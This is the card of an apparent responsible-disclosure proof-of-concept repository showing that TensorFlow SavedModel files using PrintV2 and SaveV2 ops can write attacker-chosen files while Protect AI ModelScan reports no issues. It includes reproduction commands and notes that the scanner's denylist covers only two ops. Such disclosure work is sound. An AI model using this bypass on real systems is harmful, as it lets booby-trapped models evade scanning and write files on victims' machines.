wladislax's picture
TF SavedModel ModelScan-bypass arbitrary-file-write PoCs (huntr)
35ef14f verified
|
Raw
History Blame Contribute Delete
1.9 kB
metadata
license: other
tags:
  - security
  - vulnerability-research
  - proof-of-concept
  - tensorflow
  - savedmodel
  - not-a-model
viewer: false

⚠️ Security PoC — NOT a usable model

Proof-of-concept malicious TensorFlow SavedModel files for a huntr "Model Format Vulnerability" submission (Protect AI / Palo Alto Prisma AIRS). They write attacker-chosen files when run, while being reported clean by Protect AI ModelScan. Published only for responsible-disclosure reproduction — do not run them on a machine you care about.

What it demonstrates

ModelScan's SavedModel scanner only denylists two ops (ReadFile, WriteFile). TensorFlow has many other file-I/O ops; embedding them gives the same arbitrary file write while the scanner reports 0 issues.

Dir Op Effect ModelScan
evil_printv2 PrintV2 (tf.print(..., output_stream="file://PATH")) writes attacker content to attacker path 0 issues
evil_savev2 SaveV2 writes checkpoint files at attacker path 0 issues
naive_writefile WriteFile (control) same impact HIGH — detected

Reproduce

pip install tensorflow modelscan
python build_tf_poc.py            # regenerates the three SavedModels
python load_run.py evil_printv2   # inference -> writes PWNED_printv2.txt (attacker content)
modelscan -p evil_printv2 -r json # -> total_issues: 0  (bypass)
modelscan -p naive_writefile      # -> HIGH Tensorflow.WriteFile  (control is caught)

(ModelScan must be installed with the tensorflow extra so its SavedModel scanner actually parses the graph.)

Files

  • evil_printv2/, evil_savev2/, naive_writefile/ — the SavedModel PoCs
  • build_tf_poc.py — regenerates them deterministically
  • load_run.py — loads a SavedModel and runs inference (triggers the write)